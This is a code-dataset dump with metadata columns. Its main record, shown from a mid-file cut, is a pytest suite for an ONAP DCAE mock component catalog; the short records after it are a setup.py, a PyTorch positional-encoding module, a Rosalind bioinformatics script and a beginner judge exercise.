"timeout": "1s"
}
}
}
_df1_spec = {
"self": {
"name": "std.format_one",
"version": "1.0.0",
"description": "df1"
},
"dataformatversion": "1.0.0",
"jsonschema": {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"raw-text": {
"type": "string"
}
},
"required": ["raw-text"],
"additionalProperties": False
}
}
_df2_spec = {
"self": {
"name": "std.format_two",
"version": "1.5.0",
"description": "df2"
},
"dataformatversion": "1.0.0",
"jsonschema": {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"raw-text": {
"type": "string"
}
},
"required": ["raw-text"],
"additionalProperties": False
}
}
_df2v2_spec = {
"self": {
"name": "std.format_two",
"version": "2.0.0",
"description": "df2"
},
"dataformatversion": "1.0.0",
"jsonschema": {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"raw-text": {
"type": "string"
}
},
"required": ["raw-text"],
"additionalProperties": False
}
}
_cdap_spec={
"self":{
"name":"std.cdap_comp",
"version":"0.0.0",
"description":"cdap test component",
"component_type":"cdap"
},
"streams":{
"publishes":[
{
"format":"std.format_one",
"version":"1.0.0",
"config_key":"pub1",
"type": "http"
}
],
"subscribes":[
{
"format":"std.format_two",
"version":"1.5.0",
"route":"/sub1",
"type": "http"
}
]
},
"services":{
"calls":[
],
"provides":[
{
"request":{
"format":"std.format_one",
"version":"1.0.0"
},
"response":{
"format":"std.format_two",
"version":"1.5.0"
},
"service_name":"baphomet",
"service_endpoint":"rises",
"verb":"GET"
}
]
},
"parameters": {
"app_config" : [],
"app_preferences" : [],
"program_preferences" : []
},
"artifacts": [{"uri": "bahpomet.com", "type": "jar"}],
"auxilary": {
"streamname":"streamname",
"artifact_version":"6.6.6",
"artifact_name": "test_name",
"programs" : [{"program_type" : "flows", "program_id" : "flow_id"}]
}
}
def test_component_basic(mock_cli_config, mock_db_url, catalog=None):
    '''Tests basic component usage of MockCatalog.

    Covers: duplicate format rejection, missing-format rejection when adding
    a component, duplicate component rejection, and version resolution via
    verify_component.
    '''
    if catalog is None:
        # Fresh throwaway catalog; enforce_image=False avoids docker checks.
        mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
                enforce_image=False, db_url=mock_db_url)
    else:
        mc = catalog
    c1_spec = deepcopy(_c1_spec)
    df1_spec = deepcopy(_df1_spec)
    df2_spec = deepcopy(_df2_spec)
    user = "test_component_basic"
    # success
    mc.add_format(df2_spec, user)
    # duplicate
    with pytest.raises(DuplicateEntry):
        mc.add_format(df2_spec, user)
    # component relies on df1_spec which hasn't been added
    with pytest.raises(MissingEntry):
        mc.add_component(user, c1_spec)
    # add df1 and comp1
    mc.add_format(df1_spec, user)
    mc.add_component(user, c1_spec)
    with pytest.raises(DuplicateEntry):
        mc.add_component(user, c1_spec)
    # version=None resolves the latest stored version of the component
    cname, cver = mc.verify_component('std.comp_one', version=None)
    assert cver == '1.0.0'
def test_format_basic(mock_cli_config, mock_db_url, catalog=None):
    '''Tests basic data format usage of MockCatalog.

    Covers: duplicate rejection, in-place update of an existing version,
    adding a new version, updating a non-existent format, and retrieval of
    the latest spec.
    '''
    if catalog is None:
        mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
                db_url=mock_db_url)
    else:
        mc = catalog
    user = "test_format_basic"
    df1_spec = deepcopy(_df1_spec)
    df2_spec = deepcopy(_df2_spec)
    # success
    mc.add_format(df1_spec, user)
    # duplicate is bad
    with pytest.raises(DuplicateEntry):
        mc.add_format(df1_spec, user)
    # allow update of same version
    new_descr = 'a new description'
    df1_spec['self']['description'] = new_descr
    mc.add_format(df1_spec, user, update=True)
    # adding a new version is kosher
    new_ver = '2.0.0'
    df1_spec['self']['version'] = new_ver
    mc.add_format(df1_spec, user)
    # can't update a format that doesn't exist
    with pytest.raises(MissingEntry):
        mc.add_format(df2_spec, user, update=True)
    # get spec and make sure it's updated; version=None fetches the latest
    spec = mc.get_format_spec(df1_spec['self']['name'], version=None)
    assert spec['self']['version'] == new_ver
    assert spec['self']['description'] == new_descr
def test_discovery(mock_cli_config, mock_db_url, catalog=None):
    '''Verify that get_discovery_for_docker builds params and interface maps.

    After registering comp_one and comp_two, the discovery result for
    comp_one must contain its default parameters and map its pub/call
    config keys to the matching downstream component (comp_two).
    '''
    if catalog is None:
        mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
                enforce_image=False, db_url=mock_db_url)
    else:
        mc = catalog
    user = "test_discovery"
    c1_spec = deepcopy(_c1_spec)
    df1_spec = deepcopy(_df1_spec)
    c2_spec = deepcopy(_c2_spec)
    mc.add_format(df1_spec, user)
    mc.add_component(user, c1_spec)
    mc.add_component(user, c2_spec)
    params, interfaces = mc.get_discovery_for_docker(c1_spec['self']['name'], c1_spec['self']['version'])
    # Default parameter values come straight from the component spec.
    assert params == {'bar': 2, 'foo': 1}
    # Each config key resolves to the (name, version) of matching components.
    assert interfaces == {'call1': [('std.comp_two', '1.0.0')], 'pub1': [('std.comp_two', '1.0.0')]}
def _spec_tuple(dd):
'''Returns a (name, version, component type) tuple from a given component spec dict'''
return dd['self']['name'], dd['self']['version'], dd['self']['component_type']
def _comp_tuple_set(*dds):
    '''Return the set of (name, version, component_type) tuples for the given component specs.'''
    return {_spec_tuple(dd) for dd in dds}
def _format_tuple(dd):
'''Returns a (name, version) tuple from a given data format spec dict'''
return dd['self']['name'], dd['self']['version']
def _format_tuple_set(*dds):
    '''Return the set of (name, version) tuples for the given data format specs.'''
    return {_format_tuple(dd) for dd in dds}
def test_comp_list(mock_cli_config, mock_db_url, catalog=None):
    '''Verify component listing and its filters.

    Registers three formats and five components (including two versions of
    comp_two and a CDAP app), then exercises list_components with:
    latest-only vs all versions, subscribes/publishes/calls/provides
    filters, MissingEntry for unknown format versions, and the
    only_published flag after publishing one component.
    '''
    if catalog is None:
        mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
                enforce_image=False, db_url=mock_db_url)
    else:
        mc = catalog
    user = "test_comp_list"
    df1_spec = deepcopy(_df1_spec)
    df2_spec = deepcopy(_df2_spec)
    df2v2_spec = deepcopy(_df2v2_spec)
    c1_spec = deepcopy(_c1_spec)
    c2_spec = deepcopy(_c2_spec)
    c2v2_spec = deepcopy(_c2v2_spec)
    c3_spec = deepcopy(_c3_spec)
    mc.add_format(df1_spec, user)
    mc.add_format(df2_spec, user)
    mc.add_format(df2v2_spec, user)
    mc.add_component(user, c1_spec)
    mc.add_component(user, c2_spec)
    mc.add_component(user, c2v2_spec)
    mc.add_component(user, c3_spec)
    mc.add_component(user,_cdap_spec)
    def components_to_specs(components):
        # list_components returns rows whose "spec" field is a JSON string.
        return [ json.loads(c["spec"]) for c in components ]
    # latest by default: only v2 of c2 should appear
    components = mc.list_components()
    specs = components_to_specs(components)
    assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec, c2v2_spec, c3_spec, _cdap_spec)
    # all components, every version
    components = mc.list_components(latest=False)
    specs = components_to_specs(components)
    assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec, c2_spec, c2v2_spec, c3_spec, _cdap_spec)
    # filter by subscribed format (None -> latest version of that format)
    components = mc.list_components(subscribes=[('std.format_one', None)])
    specs = components_to_specs(components)
    assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec, c2v2_spec)
    # no comps subscribe to latest std.format_two
    components = mc.list_components(subscribes=[('std.format_two', None)])
    assert not components
    components = mc.list_components(subscribes=[('std.format_two', '1.5.0')])
    specs = components_to_specs(components)
    assert _comp_tuple_set(*specs) == _comp_tuple_set(c3_spec, _cdap_spec)
    # raise if the filter references a format version that doesn't exist
    with pytest.raises(MissingEntry):
        mc.list_components(subscribes=[('std.format_two', '5.0.0')])
    # filter by published format
    components = mc.list_components(publishes=[('std.format_one', None)])
    specs = components_to_specs(components)
    assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec, _cdap_spec)
    # filter by (request, response) call pair
    components = mc.list_components(calls=[(('std.format_one', None), ('std.format_one', None)), ])
    specs = components_to_specs(components)
    assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec)
    # raise if format doesn't exist in the calls filter either
    with pytest.raises(MissingEntry):
        mc.list_components(calls=[(('std.format_one', '5.0.0'), ('std.format_one', None)), ])
    # filter by (request, response) provides pair
    components = mc.list_components(provides=[(('std.format_one', '1.0.0'), ('std.format_two', '1.5.0')), ])
    specs = components_to_specs(components)
    assert _comp_tuple_set(*specs) == _comp_tuple_set(c3_spec, _cdap_spec)
    # test for listing published components
    name_pub = c1_spec["self"]["name"]
    version_pub = c1_spec["self"]["version"]
    mc.publish_component(user, name_pub, version_pub)
    components = mc.list_components(only_published=True)
    specs = components_to_specs(components)
    assert _comp_tuple_set(*specs) == _comp_tuple_set(c1_spec)
    # only_published=False still lists the (4) latest components
    components = mc.list_components(only_published=False)
    assert len(components) == 4
def test_format_list(mock_cli_config, mock_db_url, catalog=None):
    '''Verify data-format listing: latest-only default, latest=False,
    and the only_published flag after publishing one format.'''
    if catalog is None:
        mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
                enforce_image=False, db_url=mock_db_url)
    else:
        mc = catalog
    user = "test_format_list"
    df1_spec = deepcopy(_df1_spec)
    df2_spec = deepcopy(_df2_spec)
    df2v2_spec = deepcopy(_df2v2_spec)
    mc.add_format(df1_spec, user)
    mc.add_format(df2_spec, user)
    mc.add_format(df2v2_spec, user)
    def formats_to_specs(components):
        # list_formats returns rows whose "spec" field is a JSON string.
        return [ json.loads(c["spec"]) for c in components ]
    # latest by default: ensure only v2 of df2 makes it
    formats = mc.list_formats()
    specs = formats_to_specs(formats)
    assert _format_tuple_set(*specs) == _format_tuple_set(df1_spec, df2v2_spec)
    # list all versions
    formats = mc.list_formats(latest=False)
    specs = formats_to_specs(formats)
    assert _format_tuple_set(*specs) == _format_tuple_set(df1_spec, df2_spec, df2v2_spec)
    # test listing of published formats
    name_pub = df1_spec["self"]["name"]
    version_pub = df1_spec["self"]["version"]
    mc.publish_format(user, name_pub, version_pub)
    formats = mc.list_formats(only_published=True)
    specs = formats_to_specs(formats)
    assert _format_tuple_set(*specs) == _format_tuple_set(df1_spec)
    # only_published=False still lists both latest formats
    formats = mc.list_formats(only_published=False)
    assert len(formats) == 2
def test_component_add_cdap(mock_cli_config, mock_db_url, catalog=None):
    '''Verify a CDAP component round-trips through the catalog.

    After adding the mock CDAP spec, get_cdap must return the jar uri
    (first artifact), the auxilary CDAP config, and the full spec intact.
    '''
    if catalog is None:
        mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
                db_url=mock_db_url)
    else:
        mc = catalog
    user = "test_component_add_cdap"
    df1_spec = deepcopy(_df1_spec)
    df2_spec = deepcopy(_df2_spec)
    # Both referenced formats must exist before the component is added.
    mc.add_format(df1_spec, user)
    mc.add_format(df2_spec, user)
    mc.add_component(user, _cdap_spec)
    name, version, _ = _spec_tuple(_cdap_spec)
    jar_out, cdap_config_out, spec_out = mc.get_cdap(name, version)
    assert _cdap_spec["artifacts"][0]["uri"] == jar_out
    assert _cdap_spec["auxilary"] == cdap_config_out
    assert _cdap_spec == spec_out
def test_get_discovery_from_spec(mock_cli_config, mock_db_url):
    '''Verify get_discovery_from_spec across several spec states.

    Cases covered, in order: (1) spec not yet in the catalog, (2) spec
    already registered with a renamed call config key, (3) a message
    router stream, which moves the key from the interface map into the
    dmaap config-key lists, and (4) an unregistered CDAP spec.
    '''
    mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
            enforce_image=False, db_url=mock_db_url)
    user = "test_get_discovery_from_spec"
    c1_spec_updated = deepcopy(_c1_spec)
    c1_spec_updated["streams"]["publishes"][0] = {
        'format': 'std.format_one',
        'version': '1.0.0',
        'config_key': 'pub1',
        'type': 'http'
    }
    c1_spec_updated["streams"]["subscribes"][0] = {
        'format': 'std.format_one',
        'version': '1.0.0',
        'route': '/sub1',
        'type': 'http'
    }
    # Case when c1 doesn't exist in the catalog yet
    mc.add_format(_df1_spec, user)
    mc.add_component(user, _c2_spec)
    actual_params, actual_interface_map, actual_dmaap_config_keys \
        = mc.get_discovery_from_spec(user, c1_spec_updated, None)
    assert actual_params == {'bar': 2, 'foo': 1}
    assert actual_interface_map == { 'pub1': [('std.comp_two', '1.0.0')],
        'call1': [('std.comp_two', '1.0.0')] }
    # No dmaap streams -> empty (publishes, subscribes) key lists.
    assert actual_dmaap_config_keys == ([], [])
    # Case when c1 already exists; the renamed call key must be honored
    mc.add_component(user,_c1_spec)
    c1_spec_updated["services"]["calls"][0]["config_key"] = "callme"
    actual_params, actual_interface_map, actual_dmaap_config_keys \
        = mc.get_discovery_from_spec(user, c1_spec_updated, None)
    assert actual_params == {'bar': 2, 'foo': 1}
    assert actual_interface_map == { 'pub1': [('std.comp_two', '1.0.0')],
        'callme': [('std.comp_two', '1.0.0')] }
    assert actual_dmaap_config_keys == ([], [])
    # Case where a dmaap (message router) stream is added: 'pub1' leaves the
    # interface map and shows up in the dmaap publishes key list instead.
    # TODO: Add in subscribes test case after spec gets pushed
    c1_spec_updated["streams"]["publishes"][0] = {
        'format': 'std.format_one',
        'version': '1.0.0',
        'config_key': 'pub1',
        'type': 'message router'
    }
    actual_params, actual_interface_map, actual_dmaap_config_keys \
        = mc.get_discovery_from_spec(user, c1_spec_updated, None)
    assert actual_params == {'bar': 2, 'foo': 1}
    assert actual_interface_map == { 'callme': [('std.comp_two', '1.0.0')] }
    assert actual_dmaap_config_keys == (["pub1"], [])
    # Case when a cdap spec doesn't exist in the catalog
    cdap_spec = deepcopy(_cdap_spec)
    cdap_spec["streams"]["publishes"][0] = {
        'format': 'std.format_one',
        'version': '1.0.0',
        'config_key': 'pub1',
        'type': 'http'
    }
    cdap_spec["streams"]["subscribes"][0] = {
        'format': 'std.format_two',
        'version': '1.5.0',
        'route': '/sub1',
        'type': 'http'
    }
    mc.add_format(_df2_spec, user)
    actual_params, actual_interface_map, actual_dmaap_config_keys \
        = mc.get_discovery_from_spec(user, cdap_spec, None)
    # CDAP params are the CDAP-specific trio, not docker-style parameters.
    assert actual_params == {'program_preferences': [], 'app_config': {}, 'app_preferences': {}}
    assert actual_interface_map == {'pub1': [('std.comp_two', '1.0.0'), ('std.comp_one', '1.0.0')]}
    assert actual_dmaap_config_keys == ([], [])
def test_get_unpublished_formats(mock_cli_config, mock_db_url, catalog=None):
    '''Verify get_unpublished_formats before and after publishing.

    A freshly added component must report its data format as unpublished;
    after publish_format the list must be empty.
    '''
    if catalog is None:
        mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
                enforce_image=False, db_url=mock_db_url)
    else:
        mc = catalog
    user = "test_get_unpublished_formats"
    mc.add_format(_df1_spec, user)
    mc.add_component(user, _c1_spec)
    # detect unpublished formats
    name_to_pub = _c1_spec["self"]["name"]
    version_to_pub = _c1_spec["self"]["version"]
    formats = mc.get_unpublished_formats(name_to_pub, version_to_pub)
    assert [('std.format_one', '1.0.0')] == formats
    # all formats published -> nothing left to report
    mc.publish_format(user, _df1_spec["self"]["name"], _df1_spec["self"]["version"])
    formats = mc.get_unpublished_formats(name_to_pub, version_to_pub)
    assert len(formats) == 0
def test_get_unique_format_things():
    '''_get_unique_format_things must collapse duplicate entries into one ORM apiece.'''
    # Key extractor and fake ORM factory stand in for the real format machinery.
    def make_key(entry):
        return (entry["name"], entry["version"])
    def fake_orm(name, version):
        return ("ORM", name, version)
    duplicated_entries = [
        {"name": "abc", "version": 123},
        {"name": "abc", "version": 123},
        {"name": "abc", "version": 123},
        {"name": "def", "version": 456},
        {"name": "def", "version": 456},
    ]
    result = _get_unique_format_things(make_key, fake_orm, duplicated_entries)
    # Order is not guaranteed, so compare sorted.
    assert sorted(result) == sorted([("ORM", "abc", 123), ("ORM", "def", 456)])
def test_filter_latest():
    '''_filter_latest keeps only the highest version per (name) entry.'''
    orms = [('std.empty.get', '1.0.0'), ('std.unknown', '1.0.0'),
            ('std.unknown', '1.0.1'), ('std.empty.get', '1.0.1')]
    assert list(catalog._filter_latest(orms)) == [('std.empty.get', '1.0.1'), \
            ('std.unknown', '1.0.1')]
def test_raise_if_duplicate():
    '''_raise_if_duplicate must translate DB uniqueness errors to DuplicateEntry.

    sqlite signals uniqueness via the error message args; postgres signals it
    via pgcode 23505 (unique_violation). Both paths are exercised with fake
    `orig` objects wrapped in SQLAlchemy IntegrityError.
    '''
    class FakeOrig(object):
        # sqlite: uniqueness detected from the message args
        args = ["unique", "duplicate"]
    url = "sqlite"
    orig = FakeOrig()
    error = IntegrityError("Error about uniqueness", None, orig)
    with pytest.raises(catalog.DuplicateEntry):
        catalog._raise_if_duplicate(url, error)
    # Couldn't find psycopg2.IntegrityError constructor nor way
    # to set pgcode so decided to mock it.
    class FakeOrigPostgres(object):
        # postgres: 23505 is the unique_violation error code
        pgcode = "23505"
    url = "postgres"
    orig = FakeOrigPostgres()
    error = IntegrityError("Error about uniqueness", None, orig)
    with pytest.raises(catalog.DuplicateEntry):
        catalog._raise_if_duplicate(url, error)
def test_get_docker_image_from_spec():
    '''The docker image uri is extracted from the component spec's artifacts.'''
    assert "foo-image" == catalog._get_docker_image_from_spec(_c1_spec)
def test_get_cdap_jar_from_spec():
    '''The CDAP jar uri is extracted from the CDAP spec's artifacts.'''
    assert "bahpomet.com" == catalog._get_cdap_jar_from_spec(_cdap_spec)
def test_build_config_keys_map():
    '''build_config_keys_map groups every config_key by its spec section.

    Entries without a config_key (route-based http subscribes/provides)
    must be absent from the result; the rest carry their group and, for
    streams, their transport type.
    '''
    stub_spec = {
        'streams': {
            'publishes': [
                {'format': 'std.format_one', 'version': '1.0.0',
                    'config_key': 'pub1', 'type': 'http'},
                {'format': 'std.format_one', 'version': '1.0.0',
                    'config_key': 'pub2', 'type': 'message_router'}
            ],
            'subscribes': [
                {'format': 'std.format_one', 'version': '1.0.0', 'route': '/sub1',
                    'type': 'http'},
                {'format': 'std.format_one', 'version': '1.0.0',
                    'config_key': 'sub2', 'type': 'message_router'}
            ]
        },
        'services': {
            'calls': [
                {'request': {'format': 'std.format_one', 'version': '1.0.0'},
                    'response': {'format': 'std.format_one', 'version': '1.0.0'},
                    'config_key': 'call1'}
            ],
            'provides': [
                {'request': {'format': 'std.format_one', 'version': '1.0.0'},
                    'response': {'format': 'std.format_one', 'version': '1.0.0'},
                    'route': '/prov1'}
            ]
        }
    }
    grouping = catalog.build_config_keys_map(stub_spec)
    # Note: the http subscribe and the provides entry are route-based
    # (no config_key) and therefore do not appear in the map.
    expected = {'call1': {'group': 'services_calls'}, 'pub1': {'type': 'http', 'group': 'streams_publishes'}, 'sub2': {'type': 'message_router', 'group': 'streams_subscribes'}, 'pub2': {'type': 'message_router', 'group': 'streams_publishes'}}
    assert expected == grouping
def test_get_data_router_subscriber_route():
    '''get_data_router_subscriber_route returns the route for a data_router
    key and raises MissingEntry for non-data_router or unknown keys.'''
    spec = {"streams": {"subscribes": [ { "type": "data_router", "config_key":
        "alpha", "route": "/alpha" }, { "type": "message_router", "config_key":
        "beta" } ]}}
    assert "/alpha" == catalog.get_data_router_subscriber_route(spec, "alpha")
    # 'beta' exists but is message_router, not data_router
    with pytest.raises(catalog.MissingEntry):
        catalog.get_data_router_subscriber_route(spec, "beta")
    # 'gamma' does not exist at all
    with pytest.raises(catalog.MissingEntry):
        catalog.get_data_router_subscriber_route(spec, "gamma")
# Allow running this module directly (outside a plain `pytest` invocation).
if __name__ == '__main__':
    '''Test area'''
    pytest.main([__file__, ])
| en | 0.768562 | # ============LICENSE_START======================================================= # org.onap.dcae # ================================================================================ # Copyright (c) 2017-2018 AT&T Intellectual Property. All rights reserved. # ================================================================================ # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============LICENSE_END========================================================= # # ECOMP is a trademark and service mark of AT&T Intellectual Property. # -*- coding: utf-8 -*- Tests the mock catalog #", #", #", Tests basic component usage of MockCatalog # success # duplicate # component relies on df1_spec which hasn't been added # add df1 and comp1 Tests basic data format usage of MockCatalog # success # duplicate is bad # allow update of same version # adding a new version is kosher # can't update a format that doesn't exist # get spec and make sure it's updated Tests creation of discovery objects Returns a (name, version, component type) tuple from a given component spec dict Runs a set of component spec tuples Returns a (name, version) tuple from a given data format spec dict Runs a set of data format spec tuples Tests the list functionality of the catalog # latest by default. 
only v2 of c2 # all components # no comps subscribe to latest std.format_two # raise if format doesn't exist # raise if format doesn't exist # test for listing published components Tests the list functionality of the catalog # latest by default. ensure only v2 of df2 makes it # list all # test listing of published formats Adds a mock CDAP application # Case when c1 doesn't exist # Case when c1 already exist # Case where add in dmaap streams # TODO: Add in subscribes test case after spec gets pushed # Case when cdap spec doesn't exist # detect unpublished formats # all formats published # Couldn't find psycopg2.IntegrityError constructor nor way # to set pgcode so decided to mock it. Test area | 1.600847 | 2 |
setup.py | tejaskannan/adaptive-sensor-security | 0 | 6623931 | <reponame>tejaskannan/adaptive-sensor-security
from setuptools import setup
with open('requirements.txt', 'r') as fin:
reqs = fin.read().split('\n')
setup(
name='adaptiveleak',
version='1.0.0',
author='<NAME>',
email='<EMAIL>',
description='Removing information leakage from adaptive sampling protocols.',
packages=['adaptiveleak'],
install_requires=reqs
)
| from setuptools import setup
with open('requirements.txt', 'r') as fin:
reqs = fin.read().split('\n')
setup(
name='adaptiveleak',
version='1.0.0',
author='<NAME>',
email='<EMAIL>',
description='Removing information leakage from adaptive sampling protocols.',
packages=['adaptiveleak'],
install_requires=reqs
) | none | 1 | 1.326685 | 1 | |
__init__.py | slaclab/LogBookClient | 1 | 6623932 | <filename>__init__.py<gh_stars>1-10
from LogBookClient.LogBookWebService import LogBookWebService
| <filename>__init__.py<gh_stars>1-10
from LogBookClient.LogBookWebService import LogBookWebService
| none | 1 | 1.076829 | 1 | |
projects/CT/CT/positinal_encoding.py | ronenroi/pytorch3d | 0 | 6623933 |
from typing import Tuple
import torch
from pytorch3d.renderer import RayBundle, ray_bundle_to_ray_points
from nerf.nerf.harmonic_embedding import HarmonicEmbedding
class PositionalEncoding(torch.nn.Module):
def __init__(
self,
n_harmonic_functions_xyz: int = 6,
n_harmonic_functions_dir: int = 4,
**kwargs,
):
"""
Args:
n_harmonic_functions_xyz: The number of harmonic functions
used to form the harmonic embedding of 3D point locations.
n_harmonic_functions_dir: The number of harmonic functions
used to form the harmonic embedding of the ray directions.
"""
super().__init__()
# The harmonic embedding layer converts input 3D coordinates
# to a representation that is more suitable for
# processing with a deep neural network.
self.harmonic_embedding_xyz = HarmonicEmbedding(n_harmonic_functions_xyz)
self.harmonic_embedding_dir = HarmonicEmbedding(n_harmonic_functions_dir)
self.embedding_dim_xyz = n_harmonic_functions_xyz * 2 * 3 + 3
self.embedding_dim_dir = n_harmonic_functions_dir * 2 * 3 + 3
def forward(
self,
points: torch.Tensor,
directions: torch.Tensor,
**kwargs,
) -> Tuple[torch.Tensor, torch.Tensor]:
"""
The forward function embeds the 3D points and rays normalized directions
sampled along projection rays in camera coordinate system.
Args:
points: A tensor of shape `(minibatch, ..., 3)` denoting the
3D points of the sampled rays in camera coords.
directions: A tensor of shape `(minibatch, ..., 3)`
containing the normalized direction vectors of the sampled rays in camera coords.
Returns:
embeds_xyz: A tensor of shape `(minibatch x ... x self.n_harmonic_functions_dir*6 + 3)`
represents the 3D points embedding.
embeds_dir: A tensor of shape `(minibatch x ... x self.n_harmonic_functions_xyz*6 + 3)`
represents the normalized directions embedding.
"""
# We first convert the ray parametrizations to world
# coordinates with `ray_bundle_to_ray_points`.
# rays_points_world = ray_bundle_to_ray_points(ray_bundle)
# rays_points_world.shape = [minibatch x ... x 3]
directions = self.harmonic_embedding_dir(directions)
# embeds_xyz.shape = [minibatch x ... x self.n_harmonic_functions_dir*6 + 3]
# For each 3D world coordinate, we obtain its harmonic embedding.
points = self.harmonic_embedding_xyz(points)
# embeds_xyz.shape = [minibatch x ... x self.n_harmonic_functions_xyz*6 + 3]
return points, directions
|
from typing import Tuple
import torch
from pytorch3d.renderer import RayBundle, ray_bundle_to_ray_points
from nerf.nerf.harmonic_embedding import HarmonicEmbedding
class PositionalEncoding(torch.nn.Module):
def __init__(
self,
n_harmonic_functions_xyz: int = 6,
n_harmonic_functions_dir: int = 4,
**kwargs,
):
"""
Args:
n_harmonic_functions_xyz: The number of harmonic functions
used to form the harmonic embedding of 3D point locations.
n_harmonic_functions_dir: The number of harmonic functions
used to form the harmonic embedding of the ray directions.
"""
super().__init__()
# The harmonic embedding layer converts input 3D coordinates
# to a representation that is more suitable for
# processing with a deep neural network.
self.harmonic_embedding_xyz = HarmonicEmbedding(n_harmonic_functions_xyz)
self.harmonic_embedding_dir = HarmonicEmbedding(n_harmonic_functions_dir)
self.embedding_dim_xyz = n_harmonic_functions_xyz * 2 * 3 + 3
self.embedding_dim_dir = n_harmonic_functions_dir * 2 * 3 + 3
def forward(
self,
points: torch.Tensor,
directions: torch.Tensor,
**kwargs,
) -> Tuple[torch.Tensor, torch.Tensor]:
"""
The forward function embeds the 3D points and rays normalized directions
sampled along projection rays in camera coordinate system.
Args:
points: A tensor of shape `(minibatch, ..., 3)` denoting the
3D points of the sampled rays in camera coords.
directions: A tensor of shape `(minibatch, ..., 3)`
containing the normalized direction vectors of the sampled rays in camera coords.
Returns:
embeds_xyz: A tensor of shape `(minibatch x ... x self.n_harmonic_functions_dir*6 + 3)`
represents the 3D points embedding.
embeds_dir: A tensor of shape `(minibatch x ... x self.n_harmonic_functions_xyz*6 + 3)`
represents the normalized directions embedding.
"""
# We first convert the ray parametrizations to world
# coordinates with `ray_bundle_to_ray_points`.
# rays_points_world = ray_bundle_to_ray_points(ray_bundle)
# rays_points_world.shape = [minibatch x ... x 3]
directions = self.harmonic_embedding_dir(directions)
# embeds_xyz.shape = [minibatch x ... x self.n_harmonic_functions_dir*6 + 3]
# For each 3D world coordinate, we obtain its harmonic embedding.
points = self.harmonic_embedding_xyz(points)
# embeds_xyz.shape = [minibatch x ... x self.n_harmonic_functions_xyz*6 + 3]
return points, directions
| en | 0.670844 | Args: n_harmonic_functions_xyz: The number of harmonic functions used to form the harmonic embedding of 3D point locations. n_harmonic_functions_dir: The number of harmonic functions used to form the harmonic embedding of the ray directions. # The harmonic embedding layer converts input 3D coordinates # to a representation that is more suitable for # processing with a deep neural network. The forward function embeds the 3D points and rays normalized directions sampled along projection rays in camera coordinate system. Args: points: A tensor of shape `(minibatch, ..., 3)` denoting the 3D points of the sampled rays in camera coords. directions: A tensor of shape `(minibatch, ..., 3)` containing the normalized direction vectors of the sampled rays in camera coords. Returns: embeds_xyz: A tensor of shape `(minibatch x ... x self.n_harmonic_functions_dir*6 + 3)` represents the 3D points embedding. embeds_dir: A tensor of shape `(minibatch x ... x self.n_harmonic_functions_xyz*6 + 3)` represents the normalized directions embedding. # We first convert the ray parametrizations to world # coordinates with `ray_bundle_to_ray_points`. # rays_points_world = ray_bundle_to_ray_points(ray_bundle) # rays_points_world.shape = [minibatch x ... x 3] # embeds_xyz.shape = [minibatch x ... x self.n_harmonic_functions_dir*6 + 3] # For each 3D world coordinate, we obtain its harmonic embedding. # embeds_xyz.shape = [minibatch x ... x self.n_harmonic_functions_xyz*6 + 3] | 2.729544 | 3 |
rosalind/shared_motif.py | wojwarych/bioinf | 0 | 6623934 | #!/usr/bin/env python3
#! -*- coding: utf-8 -*-
import sys
import toolkit as tk
if __name__ == "__main__":
try:
assert len(sys.argv) > 1
except AssertionError:
print("Did not provide txt file with DNA sequence!")
else:
with open(sys.argv[1], "r") as f:
sequences = []
tmp = []
while True:
line = f.readline().rstrip()
if line.startswith(">Rosalind"):
if tmp:
seq = "".join(tmp)
sequences.append(seq)
tmp = []
else:
tmp.append(line.strip())
if not line:
sequences.append("".join(tmp))
break
for seq in sequences[:2]:
for other_seq in sequences:
print(other_seq, seq)
if other_seq == seq:
continue
n = 0
substr = ""
ret = []
while n < len(seq) and n < len(other_seq):
if other_seq[n] == seq[n]:
substr += other_seq[n]
if substr != "" and other_seq[n] != seq[n]:
ret.append(substr)
substr = ""
n += 1
ret.append(substr)
print(ret)
| #!/usr/bin/env python3
#! -*- coding: utf-8 -*-
import sys
import toolkit as tk
if __name__ == "__main__":
try:
assert len(sys.argv) > 1
except AssertionError:
print("Did not provide txt file with DNA sequence!")
else:
with open(sys.argv[1], "r") as f:
sequences = []
tmp = []
while True:
line = f.readline().rstrip()
if line.startswith(">Rosalind"):
if tmp:
seq = "".join(tmp)
sequences.append(seq)
tmp = []
else:
tmp.append(line.strip())
if not line:
sequences.append("".join(tmp))
break
for seq in sequences[:2]:
for other_seq in sequences:
print(other_seq, seq)
if other_seq == seq:
continue
n = 0
substr = ""
ret = []
while n < len(seq) and n < len(other_seq):
if other_seq[n] == seq[n]:
substr += other_seq[n]
if substr != "" and other_seq[n] != seq[n]:
ret.append(substr)
substr = ""
n += 1
ret.append(substr)
print(ret)
| en | 0.196817 | #!/usr/bin/env python3 #! -*- coding: utf-8 -*- | 3.560528 | 4 |
Beginner/2748.py | LorranSutter/URI-Online-Judge | 0 | 6623935 | <reponame>LorranSutter/URI-Online-Judge
line = '-'*39
blank = '|' + ' '*37 + '|'
blankRoberto = '|' + ' '*8 + 'Roberto' + ' '*22 + '|'
blankNum = '|' + ' '*8 + '5786' + ' '*25 + '|'
blankUNIFEI = '|' + ' '*8 + 'UNIFEI' + ' '*23 + '|'
print(line)
print(blankRoberto)
print(blank)
print(blankNum)
print(blank)
print(blankUNIFEI)
